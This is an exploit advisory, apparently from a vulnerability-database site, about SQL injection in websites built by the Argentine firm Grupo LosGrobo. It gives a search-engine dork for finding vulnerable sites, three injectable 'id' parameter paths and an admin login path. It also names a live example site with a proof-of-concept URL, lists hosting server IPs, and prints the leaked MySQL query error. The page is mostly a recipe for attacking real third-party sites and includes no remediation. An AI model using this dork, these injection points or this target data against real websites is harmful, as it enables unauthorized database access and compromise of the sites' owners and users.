Grupo LosGrobo Web Design Argentina SQL Injection Vulnerability

2019.01.10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################ # Exploit Title : Grupo LosGrobo Web Design Argentina SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 10/01/2019 # Vendor Homepage : losgrobo.com ~ grupolosgrobo.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : intext:''Grupo LosGrobo'' site:ar # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # Cyberizm Exploit Reference Link : cyberizm.org/cyberizm-grupo-losgrobo-web-design-argentina-sql-injection.html ################################################################ # Admin Panel Login Path : /reportesUPJ/index.aspx # SQL Injection Exploit : /novedades.php?id=[SQL Injection] /mercado.php?id=[SQL Injection] /rse_notas.php?id=[SQL Injection] ################################################################ # Example Vulnerable Site => Note : (192.185.3.54) => There are 106 domains hosted on this server. Note : (192.185.30.132) => There are 63 domains hosted on this server. [+] upj.com.ar/novedades.php?id=719%27 => [ Proof of Concept ] => archive.fo/2kEkb ################################################################ # SQL Database Error : Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/upjcom/public_html/novedades.php:5) in /home/upjcom/public_html/novedades_include.php on line 2 Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/upjcom/public_html/novedades.php:5) in /home/upjcom/public_html/novedades_include.php on line 2 Consulta no vlida: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and state=1 order by created desc LIMIT 0,5' at line 1 Consulta completa: SELECT id, date_format(created,) AS fecha , title, `introtext`, alias FROM jos_content where catid=47 and id=719' and state=1 order by created desc LIMIT 0,5 ################################################################ # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top